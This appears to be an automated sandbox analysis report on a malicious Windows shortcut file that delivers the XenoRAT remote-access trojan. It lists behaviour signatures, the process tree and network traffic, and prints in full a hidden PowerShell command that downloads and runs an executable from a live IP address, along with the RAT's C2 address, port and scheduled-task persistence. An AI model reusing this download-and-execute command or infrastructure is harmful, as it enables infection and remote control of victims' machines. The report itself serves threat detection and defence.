Analysis
-
max time kernel
150s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
27-07-2024 09:38
Static task
static1
Behavioral task
behavioral1
Sample
1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk
Resource
win7-20240704-en
General
-
Target
1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk
-
Size
2KB
-
MD5
4db66f511c6604f1be1ae032b84f8358
-
SHA1
8ab73293cf42ead05326874845622cea78822c8f
-
SHA256
1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7
-
SHA512
2cf294db093bbe00ce504d2817dced1d62d7eb8af4a7183836fb4af0288f7e5018cd2226bea522ad5464b911317bd184bb36303e766fa4a59239f87878510c67
Malware Config
Extracted
http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe
Extracted
xenorat
45.66.231.63
Holid_rat_nd8859g
-
delay
60400
-
install_path
appdata
-
port
1243
-
startup_name
HDdisplay
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 1816 PoWersheLl.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1816 PoWersheLl.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation efthfxj.sfx.exe Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation efthfxj.exe Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation DisplayResolution.exe -
Executes dropped EXE 12 IoCs
pid Process 60 DisplayResolution.exe 2800 efthfxj.sfx.exe 5116 efthfxj.exe 4852 efthfxj.exe 1428 efthfxj.exe 776 efthfxj.exe 4820 efthfxj.exe 3196 efthfxj.exe 4876 efthfxj.exe 4788 efthfxj.exe 1236 efthfxj.exe 2164 efthfxj.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 5116 set thread context of 4852 5116 efthfxj.exe 102 PID 5116 set thread context of 1428 5116 efthfxj.exe 103 PID 5116 set thread context of 776 5116 efthfxj.exe 104 PID 5116 set thread context of 4820 5116 efthfxj.exe 106 PID 3196 set thread context of 4876 3196 efthfxj.exe 111 PID 3196 set thread context of 4788 3196 efthfxj.exe 112 PID 3196 set thread context of 1236 3196 efthfxj.exe 114 PID 3196 set thread context of 2164 3196 efthfxj.exe 115 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 3968 4788 WerFault.exe 112 4548 1428 WerFault.exe 103 3892 4876 WerFault.exe 111 2156 1236 WerFault.exe 114 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language efthfxj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language efthfxj.sfx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language efthfxj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language efthfxj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language efthfxj.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5104 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1816 PoWersheLl.exe 1816 PoWersheLl.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1816 PoWersheLl.exe Token: SeDebugPrivilege 5116 efthfxj.exe Token: SeDebugPrivilege 3196 efthfxj.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 776 efthfxj.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4856 wrote to memory of 1816 4856 cmd.exe 88 PID 4856 wrote to memory of 1816 4856 cmd.exe 88 PID 1816 wrote to memory of 60 1816 PoWersheLl.exe 89 PID 1816 wrote to memory of 60 1816 PoWersheLl.exe 89 PID 1816 wrote to memory of 60 1816 PoWersheLl.exe 89 PID 60 wrote to memory of 2536 60 DisplayResolution.exe 94 PID 60 wrote to memory of 2536 60 DisplayResolution.exe 94 PID 60 wrote to memory of 2536 60 DisplayResolution.exe 94 PID 2536 wrote to memory of 2800 2536 cmd.exe 97 PID 2536 wrote to memory of 2800 2536 cmd.exe 97 PID 2536 wrote to memory of 2800 2536 cmd.exe 97 PID 2800 wrote to memory of 5116 2800 efthfxj.sfx.exe 99 PID 2800 wrote to memory of 5116 2800 efthfxj.sfx.exe 99 PID 2800 wrote to memory of 5116 2800 efthfxj.sfx.exe 99 PID 5116 wrote to memory of 4852 5116 efthfxj.exe 102 PID 5116 wrote to memory of 4852 5116 efthfxj.exe 102 PID 5116 wrote to memory of 4852 5116 efthfxj.exe 102 PID 5116 wrote to memory of 4852 5116 efthfxj.exe 102 PID 5116 wrote to memory of 4852 5116 efthfxj.exe 102 PID 5116 wrote to memory of 4852 5116 efthfxj.exe 102 PID 5116 wrote to memory of 4852 5116 efthfxj.exe 102 PID 5116 wrote to memory of 4852 5116 efthfxj.exe 102 PID 5116 wrote to memory of 1428 5116 efthfxj.exe 103 PID 5116 wrote to memory of 1428 5116 efthfxj.exe 103 PID 5116 wrote to memory of 1428 5116 efthfxj.exe 103 PID 5116 wrote to memory of 1428 5116 efthfxj.exe 103 PID 5116 wrote to memory of 1428 5116 efthfxj.exe 103 PID 5116 wrote to memory of 1428 5116 efthfxj.exe 103 PID 5116 wrote to memory of 1428 5116 efthfxj.exe 103 PID 5116 wrote to memory of 1428 5116 efthfxj.exe 103 PID 5116 wrote to memory of 776 5116 efthfxj.exe 104 PID 5116 wrote to memory of 776 5116 efthfxj.exe 104 PID 5116 wrote to memory of 776 5116 efthfxj.exe 104 PID 5116 wrote to memory of 776 5116 efthfxj.exe 104 PID 5116 wrote to memory of 776 5116 efthfxj.exe 104 PID 5116 wrote to memory of 776 5116 efthfxj.exe 104 PID 5116 wrote to memory of 776 5116 efthfxj.exe 104 PID 5116 wrote to memory of 776 5116 efthfxj.exe 104 PID 5116 wrote to memory of 4820 5116 efthfxj.exe 106 PID 5116 wrote to memory of 4820 5116 efthfxj.exe 106 PID 5116 wrote to memory of 4820 5116 efthfxj.exe 106 PID 5116 wrote to memory of 4820 5116 efthfxj.exe 106 PID 5116 wrote to memory of 4820 5116 efthfxj.exe 106 PID 5116 wrote to memory of 4820 5116 efthfxj.exe 106 PID 5116 wrote to memory of 4820 5116 efthfxj.exe 106 PID 5116 wrote to memory of 4820 5116 efthfxj.exe 106 PID 4852 wrote to memory of 3196 4852 efthfxj.exe 107 PID 4852 wrote to memory of 3196 4852 efthfxj.exe 107 PID 4852 wrote to memory of 3196 4852 efthfxj.exe 107 PID 3196 wrote to memory of 4876 3196 efthfxj.exe 111 PID 3196 wrote to memory of 4876 3196 efthfxj.exe 111 PID 3196 wrote to memory of 4876 3196 efthfxj.exe 111 PID 3196 wrote to memory of 4876 3196 efthfxj.exe 111 PID 3196 wrote to memory of 4876 3196 efthfxj.exe 111 PID 3196 wrote to memory of 4876 3196 efthfxj.exe 111 PID 3196 wrote to memory of 4876 3196 efthfxj.exe 111 PID 3196 wrote to memory of 4876 3196 efthfxj.exe 111 PID 3196 wrote to memory of 4788 3196 efthfxj.exe 112 PID 3196 wrote to memory of 4788 3196 efthfxj.exe 112 PID 3196 wrote to memory of 4788 3196 efthfxj.exe 112 PID 3196 wrote to memory of 4788 3196 efthfxj.exe 112 PID 3196 wrote to memory of 4788 3196 efthfxj.exe 112 PID 3196 wrote to memory of 4788 3196 efthfxj.exe 112 PID 3196 wrote to memory of 4788 3196 efthfxj.exe 112
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe" -ExecutionPolicy -Bypass -WindowStyle hiDdEn -hiDdEn -Command PkgMgr.exe;(new-object System.Net.WebClient).DownloadFile('http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe','DisplayResolution.exe');./'DisplayResolution.exe';(get-item 'DisplayResolution.exe').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe"C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\eystsdf.cmd" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Users\Admin\AppData\Roaming\efthfxj.sfx.exeefthfxj.sfx.exe -pgtrfdewscbsdyethnymkdesppodtyuhngfszafugyRhvqxsdfHbgnmeG -dC:\Users\Admin\AppData\Roaming5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Users\Admin\AppData\Roaming\efthfxj.exe"C:\Users\Admin\AppData\Roaming\efthfxj.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Users\Admin\AppData\Roaming\efthfxj.exeC:\Users\Admin\AppData\Roaming\efthfxj.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe"C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exeC:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe9⤵
- Executes dropped EXE
PID:4876 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 8410⤵
- Program crash
PID:3892
-
-
-
C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exeC:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe9⤵
- Executes dropped EXE
PID:4788 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 8010⤵
- Program crash
PID:3968
-
-
-
C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exeC:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe9⤵
- Executes dropped EXE
PID:1236 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1236 -s 8010⤵
- Program crash
PID:2156
-
-
-
C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exeC:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2164 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "HDdisplay" /XML "C:\Users\Admin\AppData\Local\Temp\tmp35BC.tmp" /F10⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5104
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\efthfxj.exeC:\Users\Admin\AppData\Roaming\efthfxj.exe7⤵
- Executes dropped EXE
PID:1428 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 808⤵
- Program crash
PID:4548
-
-
-
C:\Users\Admin\AppData\Roaming\efthfxj.exeC:\Users\Admin\AppData\Roaming\efthfxj.exe7⤵
- Executes dropped EXE
- Suspicious use of UnmapMainImage
PID:776
-
-
C:\Users\Admin\AppData\Roaming\efthfxj.exeC:\Users\Admin\AppData\Roaming\efthfxj.exe7⤵
- Executes dropped EXE
PID:4820
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1428 -ip 14281⤵PID:1960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 776 -ip 7761⤵PID:4128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4820 -ip 48201⤵PID:2488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4876 -ip 48761⤵PID:3528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4788 -ip 47881⤵PID:2816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1236 -ip 12361⤵PID:4780
Network
-
Remote address:8.8.8.8:53Request217.106.137.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
GEThttp://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exePoWersheLl.exeRemote address:94.156.67.244:5679RequestGET /abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe HTTP/1.1
Host: 94.156.67.244:5679
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Jul 2024 09:40:18 GMT
Content-Type: application/octet-stream
Content-Length: 629724
Last-Modified: Sat, 27 Jul 2024 06:37:56 GMT
Connection: keep-alive
ETag: "66a495c4-99bdc"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.dual-a-0034.a-msedge.netg-bing-com.dual-a-0034.a-msedge.netIN CNAMEdual-a-0034.a-msedge.netdual-a-0034.a-msedge.netIN A204.79.197.237dual-a-0034.a-msedge.netIN A13.107.21.237
-
Remote address:8.8.8.8:53Request244.67.156.94.in-addr.arpaIN PTRResponse
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=Remote address:204.79.197.237:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=11DD43C306FA6C7724A0570A07DD6DF8; domain=.bing.com; expires=Thu, 21-Aug-2025 09:40:23 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1EA0C797C2394F21ABCB740B17F38FC4 Ref B: LON04EDGE0614 Ref C: 2024-07-27T09:40:23Z
date: Sat, 27 Jul 2024 09:40:22 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=Remote address:204.79.197.237:443RequestGET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=11DD43C306FA6C7724A0570A07DD6DF8
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=lUR2t-R3pzz_JvIerSdSItBBMBWqRBqXLOZ--K7TqLM; domain=.bing.com; expires=Thu, 21-Aug-2025 09:40:23 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C9C77E08551E4C50802603FF473BD1C3 Ref B: LON04EDGE0614 Ref C: 2024-07-27T09:40:23Z
date: Sat, 27 Jul 2024 09:40:22 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=Remote address:204.79.197.237:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=11DD43C306FA6C7724A0570A07DD6DF8; MSPTC=lUR2t-R3pzz_JvIerSdSItBBMBWqRBqXLOZ--K7TqLM
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: EC06ACEB9EBB42CABFBC613FF00ADF67 Ref B: LON04EDGE0614 Ref C: 2024-07-27T09:40:23Z
date: Sat, 27 Jul 2024 09:40:22 GMT
-
Remote address:8.8.8.8:53Request237.197.79.204.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request17.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request55.36.223.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request228.249.119.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request183.142.211.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request26.165.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request56.126.166.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request217.135.221.88.in-addr.arpaIN PTRResponse217.135.221.88.in-addr.arpaIN PTRa88-221-135-217deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requesttse1.mm.bing.netIN AResponsetse1.mm.bing.netIN CNAMEmm-mm.bing.net.trafficmanager.netmm-mm.bing.net.trafficmanager.netIN CNAMEax-0001.ax-msedge.netax-0001.ax-msedge.netIN A150.171.28.10ax-0001.ax-msedge.netIN A150.171.27.10
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239340418590_1Z5SLYPYIFLU5OB7B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239340418590_1Z5SLYPYIFLU5OB7B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 525311
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D322E6E5001B4C96AD331F29DFBBF045 Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
date: Sat, 27 Jul 2024 09:42:06 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239339388057_1GGG85785BK7BP6Y7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239339388057_1GGG85785BK7BP6Y7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 589683
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2FDB249C2C7A47CA908B83FB37FF85DB Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
date: Sat, 27 Jul 2024 09:42:06 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239340418589_1A7GR0X7EOYKFPJ56&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239340418589_1A7GR0X7EOYKFPJ56&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 592830
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B34D85E3DFFA43C5AAFE69D8AD8FB4AC Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
date: Sat, 27 Jul 2024 09:42:06 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 575578
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F5BCBD33E8C04898B812E1FADA2EEAF5 Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
date: Sat, 27 Jul 2024 09:42:06 GMT
-
Remote address:8.8.8.8:53Request66.112.168.52.in-addr.arpaIN PTRResponse
-
94.156.67.244:5679http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exehttpPoWersheLl.exe12.7kB 648.7kB 257 467
HTTP Request
GET http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exeHTTP Response
200 -
204.79.197.237:443https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=tls, http22.0kB 9.4kB 22 20
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=HTTP Response
204 -
260 B 5
-
1.2kB 6.9kB 15 13
-
1.2kB 6.9kB 15 13
-
150.171.28.10:443https://tse1.mm.bing.net/th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90tls, http280.1kB 2.4MB 1716 1712
HTTP Request
